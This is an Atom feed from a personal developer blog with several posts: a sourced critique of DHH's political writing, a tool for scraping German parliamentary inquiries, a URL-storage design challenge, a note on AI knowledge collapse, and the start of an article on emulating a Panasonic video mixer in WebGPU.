<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en"><generator uri="https://jekyllrb.com/" version="4.4.1">Jekyll</generator><link href="https://sebs.github.io/feed.xml" rel="self" type="application/atom+xml" /><link href="https://sebs.github.io/" rel="alternate" type="text/html" hreflang="en" /><updated>2026-10-09T12:46:33+00:00</updated><id>https://sebs.github.io/feed.xml</id><title type="html">Sebastian Schürmann</title><subtitle>Personal hub of Sebastian Schürmann: TypeScript &amp; Python developer, open-source maintainer, and builder of developer tooling and LLM/AI workflows. Based in Hamburg.</subtitle><author><name>Sebastian Schürmann</name></author><entry><title type="html">From Rails to rallies</title><link href="https://sebs.github.io/2026/10/01/from-rails-to-rallies/" rel="alternate" type="text/html" title="From Rails to rallies" /><published>2026-10-01T14:58:51+00:00</published><updated>2026-10-01T14:58:51+00:00</updated><id>https://sebs.github.io/2026/10/01/from-rails-to-rallies</id><content type="html" xml:base="https://sebs.github.io/2026/10/01/from-rails-to-rallies/"><![CDATA[<p>I learned a good part of my trade from Rails. Convention over configuration, the opinionated thing. I liked opinionated. Then in 2021 Basecamp banned “societal and political discussions” at work and <a href="https://techcrunch.com/2021/04/30/basecamp-employees-quit-ceo-letter/amp">roughly a third of the company took buyouts and left</a>. I filed that under “founders being founders” and went back to my Gemfile.</p>

<p>I should not have. Since then DHH has published a steady stream of posts on politics and culture, and I went back and read 19 of them, roughly year by year, with sources next to them. One by one they look like hot takes. Back to back they look like something else.</p>

<p>So here is every post, what he argues, and why it’s a problem. His posts are linked, and so are the sources against them. Click through.</p>

<h2 id="20212022-woke-as-the-enemy">2021–2022: “woke” as the enemy</h2>

<p><a href="https://world.hey.com/dhh/are-we-past-peak-woke-c313b7d1">Are we past peak “woke”?</a>, December 2021. He argues “woke” culture peaked in 2020-21 and is now going down. Evidence: John McWhorter’s <em>Woke Racism</em> getting airtime on mainstream TV, crime going up in Philadelphia, Chicago and San Francisco (blamed on “defund the police”), and the Virginia governor race. He closes hoping politics in general goes away from everyday life.</p>

<p>The problem is the method. Crime anecdotes from cities he doesn’t like become proof that “defund” failed, but almost nobody defunded anything: <a href="https://www.bloomberg.com/graphics/2021-city-budget-police-funding/">more than half of the 50 largest US cities kept or raised their police budgets</a>.</p>

<p><a href="https://world.hey.com/dhh/the-waning-days-of-dei-s-dominance-9a5b656c">The waning days of DEI’s dominance</a>, November 2022. Four reasons why DEI is going away: the coming Supreme Court case on affirmative action, BLM scandals, Musk buying Twitter, and tech layoffs.</p>

<p>Two problems. He states as fact that gaps in demographics are no evidence of discrimination. Audit studies say otherwise: when researchers sent <a href="https://www.iza.org/publications/dp14634">more than 83,000 fake applications to 108 of the largest US employers</a>, Black-sounding names got contacted measurably less. And he welcomes the layoffs, because they will make the “fervent ideologues” harder to hire. That’s a CTO cheering for people losing their jobs over their opinions, in a post that complains about people losing their jobs over their opinions.</p>

<p><a href="https://world.hey.com/dhh/we-must-say-no-to-these-people-e0fb301c">We must say no to these people</a>, three days later. Readers called him a white supremacist after the DEI post. His answer is McWhorter again: if you get called a racist for dissenting, don’t let it shame you. He also complains about “transitive guilt”, people around him being pressured to distance themselves.</p>

<p>The problem: if every racism accusation comes from “The Elect” and is baseless by definition, no accusation can ever land. That’s a self-sealing argument. Criticism becomes impossible, not because it’s wrong but because of who says it. <a href="https://logosjournal.com/article/review-john-mcwhorter-woke-racism-how-a-new-religion-has-betrayed-back-america-new-york-forum-2021/">Reviewers of McWhorter’s book</a> noticed the same thing about the book itself: the religion metaphor turns the other side into a uniform, intransigent cartoon.</p>

<p><a href="https://world.hey.com/dhh/the-faith-of-andrew-tate-a8a4d448">The faith of Andrew Tate</a>, September 2022. A free speech argument: banning Tate from social media is a slippery slope. To show a double standard, he quotes misogynistic lyrics from Dr. Dre, Jay-Z and Eminem, who are still celebrated. The ban, he says, hands Tate a “credible martyr role”.</p>

<p>The problem is the false equivalence: a performed rap lyric is not the same as an influencer selling teenage boys a course on controlling women. And reality caught up fast. Tate was arrested in Romania three months after this post, and <a href="https://www.aljazeera.com/news/2025/5/28/influencers-andrew-and-tristan-tate-face-uk-rape-and-trafficking-charges">the UK has since charged him with rape and human trafficking</a>.</p>

<h2 id="20232024-the-culture-war-gets-a-work-account">2023–2024: the culture war gets a work account</h2>

<p><a href="https://world.hey.com/dhh/the-law-of-the-land-c2231109">The law of the land</a>, June 2023. The Supreme Court ends race-conscious college admissions. His reaction, as its own paragraph: “Good.” He compares 2020-21 to the Red Scare and hopes companies will now drop their DEI programs.</p>

<p>The Red Scare comparison doesn’t hold. Truman’s loyalty program pushed <a href="https://www.thenation.com/article/society/clay-risen-red-scare/tnamp/">nearly 7,000 people to resign or withdraw, fired 560, and found not a single spy</a>. A diversity workshop can be annoying (I’ve sat through bad ones), but it is not a loyalty oath. To be fair, he does admit reasonable people disagree here.</p>

<p><a href="https://world.hey.com/dhh/forcing-master-to-main-was-a-good-faith-exploit-b21ee30c">Forcing master to main was a good faith exploit</a>, April 2024. He renamed the default branch in good faith, now sees it as an exploit, and promises “the firewall will be ready” next time.</p>

<p>Nothing was forced. Git simply <a href="https://www.theregister.com/2021/03/11/gitlab_main/">made the default branch name configurable</a>, and if you love “master” you can keep it. What bothers me more is the firewall: he commits to rejecting the next request before hearing what it is. That’s not scepticism. That’s having the answer before the question.</p>

<p><a href="https://world.hey.com/dhh/bad-therapy-08849dc9">Bad Therapy</a>, March 2024. A rave review of Abigail Shrier’s book about over-therapised parenting in the US. Along the way he declares her earlier book, <em>Irreversible Damage</em>, vindicated.</p>

<p>That earlier book claims the rise in trans teens is mostly social contagion. <a href="https://sciencebasedmedicine.org/the-science-of-transgender-treatment/">Science-Based Medicine called that narrative unsupported and a misreading of the evidence</a>. That is itself a contested fight (the same site retracted a positive review of the book), but “settled truth that a mob tried to censor” is not a fair description of it either.</p>

<p><a href="https://world.hey.com/dhh/too-much-therapy-at-work-f79ac95c">Too much therapy at work</a>, November 2024. An all-hands about a fired COO turned into hours of emotional processing. His conclusion: managers aren’t therapists, take it to a licensed one.</p>

<p>Honestly, the most reasonable post on this list. Plenty of people agree. It just reads different when you remember that this is the company where a third of the staff walked out in 2021, and he frames the anxiety as fragility.</p>

<p><a href="https://world.hey.com/dhh/cold-reading-an-adhd-affliction-44163793">Cold reading an ADHD affliction</a>, nine days later. ADHD diagnosis is a cottage industry, the symptom lists work like a psychic’s cold reading, and he could qualify himself.</p>

<p>He leaves out the parts of the <a href="https://www.cdc.gov/ncbddd/adhd/diagnosis.html">DSM-5 criteria</a> that actually do the work: symptoms before age 12, in more than one setting, with clear impairment at school, work or socially. Those filter out most people who just “recognise themselves”. He also calls the medication speed. To be fair, he does say real cases exist.</p>

<p><a href="https://world.hey.com/dhh/normal-boyhood-is-adhd-a9593488">Normal boyhood is ADHD</a>, April 2025. Based on a <em>New York Times Magazine</em> piece he argues most diagnoses in boys pathologise normal behaviour, and the meds don’t help learning. Then he puts ADHD medication next to the opioid crisis and puberty blockers.</p>

<p>Factual problem: he calls Ritalin an amphetamine. It’s <a href="https://childmind.org/article/treating-adhd-with-methylphenidate-ritalin-concerta/">methylphenidate, a different drug</a>. Bigger problem: lumping ADHD with opioids and trans care turns a medical debate into a culture war one.</p>

<h2 id="2025-the-year-it-stopped-being-about-work">2025: the year it stopped being about work</h2>

<p><a href="https://world.hey.com/dhh/serving-the-country-9faa5ef3">Serving the country</a>, February 8, 2025. Musk is a modern William Knudsen (the Dane who ran US war production in WWII), the most qualified man alive to fix a two-trillion-dollar deficit. “Let him cook.”</p>

<p>Published 19 days after <a href="https://en.wikipedia.org/wiki/Elon_Musk_salute_controversy">the salute</a>. And the cooking: DOGE never got anywhere near two trillion, and the GAO later found <a href="https://www.adn.com/nation-world/2026/08/06/elon-musks-doge-made-big-errors-in-claims-of-government-savings-gao-finds/">$27.4 billion of its claimed savings came from contracts that were never actually cancelled</a>.</p>

<p><a href="https://world.hey.com/dhh/gender-and-sexuality-alliances-in-primary-school-at-cis-97f66c06">Gender and Sexuality Alliances in primary school at CIS?!</a>, June 2025. His kids’ international school in Copenhagen planned a Pride week for young children, and runs a staff-supervised GSA lunch club for 8 to 11 year olds. After parent complaints, the school scaled both back.</p>

<p>He calls the lunch meetings “creepy” and asks about the staff’s qualifications. Anyone who followed US politics since 2022 knows that move, it’s the <a href="https://www.npr.org/2022/05/11/1096623939/accusations-grooming-political-attack-homophobic-origins">grooming trope used against LGBTQ teachers</a>. He also calls it indoctrination and links it to the contagion theory from Shrier.</p>

<p><a href="https://world.hey.com/dhh/the-parental-dead-end-of-consent-morality-e4e8a8ee">The parental dead end of consent morality</a>, June 2025. “Consent morality” (anything goes between consenting adults) has devalued parenthood and dragged birth rates down. Jordan Peterson gets the credit, and the post ends with “2.1 or bust, baby!”</p>

<p>Accepting that some people don’t want children is, in his words, nihilistic and cowardly. That’s straight pronatalist rhetoric, and pronatalism is a movement where you want to <a href="https://npr.org/2025/04/25/nx-s1-5371718/pronatalist-birth-rate-musk-natal-conference">check the company before you join</a>: religious right, tech people and “new right” anti-feminists, with conference speakers blaming falling birth rates on feminism and on the end of “natural hierarchies” of gender and race.</p>

<p><a href="https://world.hey.com/dhh/building-competency-is-better-than-therapy-4622c6b7">Building competency is better than therapy</a>, July 2025. Exercise, learning and community beat talk therapy for “garden-variety” depression, especially for men. His example of such a competency is his own Linux distro.</p>

<p>He cites a <a href="https://www.bmj.com/content/bmj/384/bmj-2023-075847.full.pdf">BMJ meta-analysis</a> on exercise and major depression. The authors suggest exercise next to psychotherapy and medication, and say their confidence is low. In DHH’s hands that becomes: most people don’t need therapy. Plus a plug for Omarchy.</p>

<p><a href="https://world.hey.com/dhh/the-beauty-of-ideals-b3dccf72">The beauty of ideals</a>, July 2025. Ideals should be unattainable, the 90s made losing cool, Naomi Wolf ruined beauty. A plus-size Calvin Klein ad in Copenhagen is a “grotesque display of obesity”, and representation means celebrating the obese, the lazy, the ignorant and the incompetent, all in one sentence.</p>

<p>Body size as a moral failing, right next to laziness. And it doesn’t even work as motivation: <a href="https://today.uconn.edu/2021/06/weight-stigma-is-a-burden-around-the-world-and-has-negative-consequences-everywhere">weight stigma does not make people lose weight, it makes their health worse</a>.</p>

<p><a href="https://world.hey.com/dhh/it-s-beginning-to-feel-like-the-80s-in-america-again-68c2708e">It’s beginning to feel like the 80s in America again</a>, August 2025. The Reagan years were earnest and optimistic, and 2025 finally brings that back. He praises American Eagle for not apologising for the Sydney Sweeney “great jeans” ad.</p>

<p>The ad was criticised for a genes/jeans pun with a blonde, blue-eyed model, and <a href="https://newsweek.com/sydney-sweeney-american-eagle-ad-controversy-2105004">the phrase “good genes” has a long history in American eugenics</a>. He applauds the company for refusing to even engage with that, and calls the concern “shit-tinted glasses”.</p>

<p>And then September.</p>

<p><a href="https://world.hey.com/dhh/as-i-remember-london-e7d38e64">As I remember London</a>, September 15, 2025. London isn’t his city anymore because fewer of the people there are native Brits. The number he links for “native” is the census category White British. Which makes every Black or brown Londoner born in Lewisham a foreigner. He calls it “demographic replacement”, the vocabulary of the Great Replacement conspiracy theory, and describes Tommy Robinson’s march the day before as heartwarming, the crowd as normal and peaceful.</p>

<p>It wasn’t peaceful. <a href="https://scroll.in/latest/1086557/scroll_in">26 police officers were injured at that march, and the speakers included Musk, French far-right politician Éric Zemmour and an AfD leader</a>. The documented version needs no exaggeration: a tech founder praising a far-right march, in replacement language.</p>

<p><a href="https://world.hey.com/dhh/words-are-not-violence-c751f14f">Words are not violence</a>, September 11, 2025. The day after <a href="https://sltrib.com/news/2025/09/10/charlie-kirk-shot-was-fired-utah">Charlie Kirk was shot</a>, he condemns people celebrating the killing, and argues that words must never be treated as violence.</p>

<p>On its own, nothing to argue with. Celebrating a killing is sick. The problem only shows up two weeks later.</p>

<p><a href="https://world.hey.com/dhh/calling-someone-a-nazi-is-a-permission-slip-for-violence-4bfbbb82">Calling someone a “nazi” is a permission slip for violence</a>, September 24, 2025. Calling someone a nazi authorises violence, and his opponents are “the last loonies on tech’s woke island”.</p>

<p>So words are violence after all. When they point at him. And nine days earlier, in the London post, he wrote that the nazi label had finally stopped working on anybody. Pick one.</p>

<h2 id="so-what">So what</h2>

<p>Read one post and you can shrug. A contrarian having a bad week, a Danish guy annoyed by American parenting, fine. Read them back to back and it’s not a bad week anymore. It starts with “maybe we passed peak woke” in 2021, and four years later he is writing about demographic replacement and calling a Tommy Robinson march heartwarming. That’s not a series of hot takes. It’s a route, and people have walked it before.</p>

<p>His fans will say this is just centre-right opinion, and some of the early posts are exactly that. Being sceptical of DEI trainings or ADHD overdiagnosis doesn’t make you anything. But the London post is not about immigration policy anymore. It decides who counts as British by skin colour, and that’s the point where I stop debating.</p>

<p>I don’t think DHH is a Nazi. I don’t need to. There are enough pieces of that political culture in his writing (the replacement talk, the rally, the “only my side’s words are violence” double standard) that I don’t want him, his following or his products anywhere near my work. That includes Rails, which hurts, after all these years. Every good idea in there exists elsewhere, from people who don’t come with this baggage.</p>]]></content><author><name>Sebastian Schürmann</name></author><category term="teams-and-leadership" /><category term="tech-strategy" /><summary type="html"><![CDATA[19 of DHH's posts on politics and culture since 2021, read back to back with sources: from peak woke to replacement talk, and why I'm leaving Rails.]]></summary></entry><entry><title type="html">Your website relaunch is not a moat anymore</title><link href="https://sebs.github.io/2026/09/29/your-website-relaunch-is-not-a-moat-anymore/" rel="alternate" type="text/html" title="Your website relaunch is not a moat anymore" /><published>2026-09-29T13:18:28+00:00</published><updated>2026-09-29T13:18:28+00:00</updated><id>https://sebs.github.io/2026/09/29/your-website-relaunch-is-not-a-moat-anymore</id><content type="html" xml:base="https://sebs.github.io/2026/09/29/your-website-relaunch-is-not-a-moat-anymore/"><![CDATA[<p>In January 2021 netzpolitik.org <a href="https://netzpolitik.org/2021/zum-ende-von-kleineanfragen-de-die-loesung-zu-all-unseren-problemen-koennte-in-pdfs-schlummern-die-niemand-liest/">interviewed Maximilian Richt</a> about why he switched off <a href="https://kleineanfragen.de/">kleineAnfragen.de</a>. <a href="https://de.wikipedia.org/wiki/Kleine_Anfrage">Kleine Anfragen</a> are how MPs make the government answer in writing, and the answers are public. Technically. In practice they sit as PDFs in 17 different parliament documentation systems, behind search forms nobody enjoys. Max scraped all of them, put everything in a full text search and gave everyone feeds and mail subscriptions. For years, mostly alone.</p>

<p>Why he stopped is the interesting part. The Landtage kept “relaunching”. New HTML templates, same infrastructure underneath, never open data. Every relaunch meant writing the scraper for that Landtag again from zero. In Sachsen the link to a found document just expires after 15 minutes. A mail to the Landtag NRW, who runs the <a href="https://www.parlamentsspiegel.de">Parlamentsspiegel</a> for all Länder, got answered weeks later by paper mail: “nicht zuständig”. An <a href="https://fragdenstaat.de/anfrage/dokumente-zum-parlamentsspiegel/">IFG request</a> went nowhere. You can not do this as a hobby forever, and he said so.</p>

<p>The OKFN <a href="https://okfn.de/blog/2021/01/zur-abschaltung-von-kleine-anfragen/">said it more bluntly</a>: volunteers running infrastructure that is the job of the public hand changes nothing structurally. They are right. Keep that in mind for later.</p>

<h2 id="fragmentation-does-the-work-by-itself">Fragmentation does the work by itself</h2>

<p>I spent a lot of my career extending other peoples code bases, so I know what a “relaunch” usually is: a new theme on the old thing. I don’t think anybody in a Landtag sat down and planned to break Max’s scrapers. Nobody had to. 17 parliaments, a handful of vendors, every installation configured different and every one a bit worse. The cost of reading it all lands on whoever wants to read it all, and that was one volunteer. Paid political monitoring exists, as Max points out, so the lobby groups that can afford it were fine anyway.</p>

<p>That is the data fragementation I mean. It does not need a conspiracy, it needs an asymmetry: making the mess is cheap for the publisher, cleaning it up is expensive for the reader. As long as that holds the mess wins, and “Open Data” can go into every strategy paper without anything happening.</p>

<h2 id="the-asymmetry-is-gone">The asymmetry is gone</h2>

<p>So I built <a href="https://github.com/maschinenlesbar-org/openka-cli">openka-cli</a>. 17 parliaments, one record format, <code class="language-plaintext highlighter-rouge">ka sync --source berlin</code> and <code class="language-plaintext highlighter-rouge">ka search "Brücken Zustand"</code>.</p>

<p>The part that burned Max out, rebuilding a scraper per Land per relaunch, is now the cheap part. Thüringen answers Drucksache 8/979 with 8/1715 and nothing numeric connects the two, so the connector asks the Vorgang API. Saarland’s “PDF” link is an HTML page with an iframe, so the URL gets rewritten to the download endpoint the iframe names. Sachsen hides the real file in the navigation frame of a frameset viewer. Niedersachsen has nothing reachable that links question to answer at all, so a factory tool sweeps the Drucksachen range once and freezes the map. Each of these would have been a weekend of swearing in 2016. Now it’s a prompt, a fixture and a review. When the next relaunch comes a golden fixture goes red and the fix is an hour.</p>

<p>One thing I care about, because “AI” and “government data” in one sentence makes people nervous for good reason: the agent writes the code, it does not run in it. The runtime is deterministic, no model on the line. When an extractor can’t read a document it abstains and the document lands in <code class="language-plaintext highlighter-rouge">ka review</code>. <code class="language-plaintext highlighter-rouge">ka verify</code> re-runs the extraction from the archived bytes and the record has to come out byte identical. A missing fact you can fix later. A made-up one in a corpus about what a government told its parliament is poison. Agents in the factory, boring code in the product.</p>

<p>Coverage is honest, not complete ([96 test records from eight parliaments, 68 extract completely]). The rest say what they could not read, instead of pretending.</p>

<h2 id="what-is-left-are-lawyers">What is left are lawyers</h2>

<p>Look at the sources table and you see the tricks that remain once the technical drag stops dragging. Brandenburg and Sachsen-Anhalt put <code class="language-plaintext highlighter-rouge">Disallow: /</code> in the robots.txt of their document servers. NRW disallows its own search, while running the aggregator for everyone (go figure). openka respects that by default and tells you, rather than quietly returning nothing.</p>

<p>And then there is the trick data activists know too well: getting sued. In 2021 Markus Drenger mirrored the official Hauskoordinaten from the Bavarian Landesamt on GitHub. Bayern answered with a takedown, a criminal complaint and a civil suit over database rights, with damages that <a href="https://blog.wikimedia.de/2026/09/03/wem-gehoeren-oeffentliche-geodaten/">according to Drenger</a> could have gone into the millions. Five years later the <a href="https://netzpolitik.org/2026/mit-urheberrecht-gegen-offene-daten-bayern-verliert-gegen-open-data-aktivisten/">OLG München threw it out</a> as inadmissible, because the Freistaat changed its story mid-trial about who actually built the database. No appeal. The real question, if a state can lock up data it already publishes, the court never got to. Five years of that hanging over a volunteer is the actual message, win or not.</p>

<p>The funny part is that the law is half way there. The <a href="https://www.gesetze-im-internet.de/dng/BJNR294200021.html">Datennutzungsgesetz</a> says public data should be “open by design and by default” where possible, and for high value datasets like geodata reuse has to be free. One paragraph earlier the same law says nobody gets a right to have anything published. So the principle is in the Bundesgesetzblatt and the obligation is not. “Follow your own rules” is less a legal argument than an embarrassing one.</p>

<p>For Kleine Anfragen it is even simpler. Drucksachen are published so the public can take notice, which makes them <a href="https://www.gesetze-im-internet.de/urhg/__5.html">amtliche Werke</a>: no copyright, just don’t alter them and name the source. openka does both, the archived PDF is the source. Nobody needs to sue anybody here.</p>

<p>The OKFN point still stands. I should not run the infrastructure for 17 parliaments any more than Max should have. But the math changed: when the cost of the mess no longer lands on the reader, the only one still paying for it is the publisher. Suing the people who read your public documents is the most expensive way to stay unreadable. Living up to the principle you already wrote into law, and shipping an API, is cheaper, and it’s not a moonshot. Berlin already exports PARDOK XML per Wahlperiode, the Bundestag has <a href="https://dip.bundestag.de/%C3%BCber-dip/hilfe/api">DIP</a> with a public API key. So it can be done.</p>

<p>p.s. Hamburg, my home town, runs ParlDok, the same software as Mecklenburg-Vorpommern and Thüringen, which both have a working JSON API. Hamburg’s service was unreachable when I built this. WTF Hamburtg, WTF.</p>]]></content><author><name>Sebastian Schürmann</name></author><category term="open-data" /><category term="ai-assisted-development" /><category term="tech-strategy" /><summary type="html"><![CDATA[Why Landtag relaunches killed kleineAnfragen.de, how coding agents flip the scraping cost onto the publisher, and why suing readers is the last trick left.]]></summary></entry><entry><title type="html">200 million URLs, please</title><link href="https://sebs.github.io/2026/09/15/200-million-urls-please/" rel="alternate" type="text/html" title="200 million URLs, please" /><published>2026-09-15T14:39:11+00:00</published><updated>2026-09-15T14:39:11+00:00</updated><id>https://sebs.github.io/2026/09/15/200-million-urls-please</id><content type="html" xml:base="https://sebs.github.io/2026/09/15/200-million-urls-please/"><![CDATA[<p>I have a little side project that keeps growing and at some point the question came up: where do I put 200 million URLs? Not in theory, in a box I pay for. So I turned it into a challenge and put it in a <a href="https://github.com/sebs/200-mio-urls-challenge">repo</a>, because the problem is a nice size. Big enough that the naive approach falls over, small enough that one person can tinker with it on a weekend.</p>

<p>The setup: 200 million URLs, coming from 20.000 sources, collected over four years. That is roughly 160.000 URLs per day, every day, steadily. Nothing bursts, nothing stops.</p>

<h2 id="what-it-has-to-do">What it has to do</h2>

<ul>
  <li>Store 200 million unique URLs and find them again.</li>
  <li>Tell me quickly if a given URL is already in there.</li>
  <li>Give me everything that was added today, without duplicates.</li>
  <li>Count URLs by top level domain.</li>
  <li>Count URLs by domain and subdomain.</li>
  <li>Query URLs by specific GET parameters.</li>
</ul>

<p>Optional, if you feel fancy: store the link structure. Which URLs link from here, which ones link to here. That is the point where the thing quietly turns into a graph and the storage estimate doubles, so its optional for a reason.</p>

<h2 id="why-this-is-not-just-put-it-in-postgres">Why this is not just “put it in Postgres”</h2>

<p>You can put it in Postgres. I probably will, at least at first. But a URL is not a string, it just looks like one. Protocol, host, path, query, fragment, and every part wants a different kind of index. The query part is the ugly one: <code class="language-plaintext highlighter-rouge">?a=1&amp;b=2</code> and <code class="language-plaintext highlighter-rouge">?b=2&amp;a=1</code> are the same page for most sites and different pages for some, and nobody on the web follows a standard for this. So normalization and dedup is where the real work hides, not in the INSERT.</p>

<p>Then there is the index itself. A btree over 200 million strings of maybe 80 bytes is not nothing and the “is this URL already known” check runs 160.000 times a day before anything gets written. This is the textbook case for a <a href="https://en.wikipedia.org/wiki/Bloom_filter">Bloom filter</a> in front of the real store, or for partitioning by host, or by day, or both (day partitions also make “give me todays URLs” a table scan of one small table instead of an index lookup on a huge one).</p>

<p>And the estimate. Raw data is easy, 200 million times 80 bytes, call it 16 GB. Now add the indexes, the parsed components if you store them separately, the metadata, four years of write amplification. I do not have a number I trust yet and thats half the point of the exercise. I am guessing a factor of 4 to 5 over the raw data, would love to be wrong.</p>

<h2 id="how-to-play">How to play</h2>

<p>Fork it. Do not start with the architecture diagram. Generate some synthetic URLs first, because nobody has 200 million real ones lying around, and make the generator ugly on purpose: weird parameter orders, trailing slashes, the same host in three spellings. Then build one part, measure it, throw half of it away, build the next part. Batch inserts, async writes, maybe more than one machine, whatever survives contact with the data.</p>

<p>I want to see what people come up with. The interesting solutions are not the ones with the biggest cluster, they are the ones where someone noticed which requirement is cheap and which one is a trap.</p>

<p>p.s. This is a wicked problem in the small. You will not finish it, you will just stop at some point and know a lot more about URLs than you wanted to.</p>]]></content><author><name>Sebastian Schürmann</name></author><category term="software-architecture" /><summary type="html"><![CDATA[A challenge repo on storing 200 million URLs from 20.000 sources: dedup, daily additions, domain counts, query parameters and a storage estimate.]]></summary></entry><entry><title type="html">Epistemological corrosion created by machine induced semantic replication entropy</title><link href="https://sebs.github.io/2026/09/01/epistemological-corrosion-created-by-machine-induced-semantic-replication/" rel="alternate" type="text/html" title="Epistemological corrosion created by machine induced semantic replication entropy" /><published>2026-09-01T19:33:55+00:00</published><updated>2026-09-01T19:33:55+00:00</updated><id>https://sebs.github.io/2026/09/01/epistemological-corrosion-created-by-machine-induced-semantic-replication</id><content type="html" xml:base="https://sebs.github.io/2026/09/01/epistemological-corrosion-created-by-machine-induced-semantic-replication/"><![CDATA[<p>The headline is a extract of a skeet from a gamedev/designer/dev person of <a href="https://bsky.app/profile/osaka.zone/post/3muhrsihpls2i">Bluesky: Osaka</a></p>

<p><img src="/assets/posts/epistemological-corrosion-created-by-machine-induced-semantic-replication/8rv999jg638gpmsgyzc1.webp" alt="Cycle diagram: workers de-skill, knowledge is lost, models take degraded input, outputs and users get worse, repeat" /></p>

<ul>
  <li>Skilled workers are de-skilling themselves</li>
  <li>Institutional knowledge and skills are actually being lost</li>
  <li>The models require user output as input to generate output</li>
  <li>The collapsing knowledge becomes the new input</li>
  <li>Outputs get worse</li>
  <li>Users get worse</li>
</ul>

<p>Here are some links from the skeets you probably want to read</p>

<ul>
  <li><a href="https://arxiv.org/abs/2506.00245">Beyond Semantic Entropy: Boosting LLM Uncertainty Quantification with Pairwise Semantic Similarity</a></li>
  <li><a href="https://en.wikipedia.org/wiki/Model_collapse">WP: Model Collapse</a></li>
  <li><a href="https://www.bostonreview.net/articles/knowledge-collapse/">Article: Knowledge Collapse</a></li>
  <li><a href="https://economics.mit.edu/sites/default/files/2026-02/AI%2C%20Human%20Cognition%20and%20Knowledge%20Collapse%2002-20-26.pdf">Paper: AI, Human Cognition and Knowledge Collapse</a></li>
</ul>]]></content><author><name>Sebastian Schürmann</name></author><category term="ai-and-critical-thinking" /><summary type="html"><![CDATA[A Bluesky thread on AI knowledge collapse: de-skilled workers feed degraded input to models, so outputs and users get worse, plus links to research papers.]]></summary></entry><entry><title type="html">Resurrecting the Panasonic WJ-MX50 in WebGPU</title><link href="https://sebs.github.io/2026/07/27/resurrecting-the-panasonic-wj-mx50-in-webgpu/" rel="alternate" type="text/html" title="Resurrecting the Panasonic WJ-MX50 in WebGPU" /><published>2026-07-27T22:03:04+00:00</published><updated>2026-07-27T22:03:04+00:00</updated><id>https://sebs.github.io/2026/07/27/resurrecting-the-panasonic-wj-mx50-in-webgpu</id><content type="html" xml:base="https://sebs.github.io/2026/07/27/resurrecting-the-panasonic-wj-mx50-in-webgpu/"><![CDATA[<p><em>In which a 1990s two-bus video mixer is reduced to a reducer, and the operating manual turns out to be a test suite.</em></p>

<p><img src="/assets/posts/resurrecting-the-panasonic-wj-mx50-in-webgpu/riw4pvpcrwmpz7z9d6d1.png" alt="Front panel of the original Panasonic WJ-MX50 digital A/V mixer with buttons, faders, T-bar lever and joystick" /></p>

<p>The Panasonic WJ-MX50 was a desktop digital A/V mixer sold in the early 1990s for wedding videographers, cable-access studios, and anyone else doing A/B-roll editing on S-VHS decks. Two buses, four sources, 287 wipe patterns, a chroma keyer, a downstream keyer, eight event memories, and a joystick. The whole thing was defined by a 40-page operating manual that is unusually precise about behavior: which button blinks when, which effect excludes which, how many frames an auto-fade may take (0 to 510, in steps of 2 — not 1, not 5).</p>

<p>That is what Panasonic sold it for. It is not what we used it for. Well into the 2000s, this thing was on stage with us in techno clubs, doing VJ duty for hours at a stretch. Two of its four channels were fed by computers running VJ software; the others carried digital video players and stills, depending on the club setup. The computers generated the material, but the MX50 is where the performance happened. Used that way, it stops being an editing appliance and becomes an instrument: the lever is played, not set; the joystick throws a mosaic block around the screen in time with the kick; Auto Take with the transition control at minimum is a percussion button. It is a profoundly interactive way to do visuals — interactive enough that people watching us work the panel regularly mistook us for the DJs, or for a live act. Nobody mistakes a laptop VJ for anything.</p>

<p><a href="https://www.youtube.com/watch?v=FQA_01Ck95Y">https://www.youtube.com/watch?v=FQA_01Ck95Y</a></p>

<p>So when I set out to reproduce the unit in a browser, the question was never whether it could be made to look like an MX50. The question was whether it could be made to <em>behave</em> like one — block for block, blink for blink — because an instrument lives in its behavior, and twenty-year-old muscle memory is an unforgiving reviewer. The manual served as the specification of record; my hands served as the acceptance test. The result is web-mx-50: vanilla TypeScript, WebGPU for the video path, Web Audio for the mixer, no framework, no bundler, and about 5,700 lines of source. This article describes the parts of the exercise that turned out to be interesting. The artwork is not one of them.</p>

<h2 id="the-manual-is-the-program">The manual is the program</h2>

<p>The first job was not code. It was reading the manual until it stopped being a manual and started being a data structure. The MX50’s feature set looks sprawling, but it decomposes cleanly, because the hardware itself was built from blocks wired in a fixed order:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Source -&gt; bus assignment -&gt; Colour Correction -&gt; Digital Effect
       -&gt; Mix/Wipe -&gt; Downstream Key -&gt; Fade -&gt; Program Out
</code></pre></div></div>

<p>That order is not an implementation detail; it is observable behavior. The downstream key sits after the effects, which is why a title stays sharp over a mosaic. The fade sits last, which is why you can fade the video out and leave the title standing. So the first architectural decision was to make the block order structural: the renderer is a sequence of passes in exactly that order, and no code path can reorder them. The signal graph is written down once, in one module, and everything else reads it.</p>

<p>The second observation was that nearly all of the manual’s fussy details are <em>state transitions</em>, not pixels. “Press A once, the LED blinks and CHROMA is active; press again, the LED goes solid and the RGB joystick is added; press a third time, correction is off.” “If Matte is selected on a bus and you press that bus’s direct-out button, the unit outputs the blinking substitute source instead.” “Still switches off automatically when Strobe is engaged, but Trail may run on top of Still.” None of that needs a GPU to verify. It needs a state machine and someone patient enough to transcribe the manual into scenarios.</p>

<h2 id="one-value-one-reducer">One value, one reducer</h2>

<p>The entire panel — both buses, the matte generator, the wipe pattern selection, the DSK sliders, the fade enables, all eight event memories — is a single plain JSON-serializable value. Every change goes through one pure reducer as a typed command. No classes, no observables, no GPU handles or <code class="language-plaintext highlighter-rouge">HTMLVideoElement</code> references inside the state; device bindings are referenced by id and resolved outside the store.</p>

<p>This is not a fashionable choice so much as a forced one, and the hardware forced it twice. First, the MX50 has Event Memory: eight snapshots of the complete panel, storable and recallable at the press of a button. If your state is one plain value, Event Memory is <code class="language-plaintext highlighter-rouge">structuredClone</code> and an array of eight slots. If your state is scattered across component instances, Event Memory is a research project. Second, the unit holds its settings across power cycles (about a week on the internal backup, says the manual), which maps to schema-versioned browser storage — again trivial if the state is one value, and miserable otherwise.</p>

<p>The same store made the control layer thin. The original unit had a GPI contact input and an RS-422 port for an edit controller. The browser equivalent is a mapping layer that normalizes keyboard, gamepad, MIDI, and a small automation API onto the same command vocabulary the front panel uses. A MIDI fader and the on-screen lever end up as the same command with a different origin, which is exactly how the hardware treated its own remote protocol. This layer is also where the instrument angle survives translation: a screen full of widgets is not something you can play with your eyes on the crowd, but a MIDI controller with a real crossfader is, and mapping one onto the MX50’s command set takes a table, not a subsystem.</p>

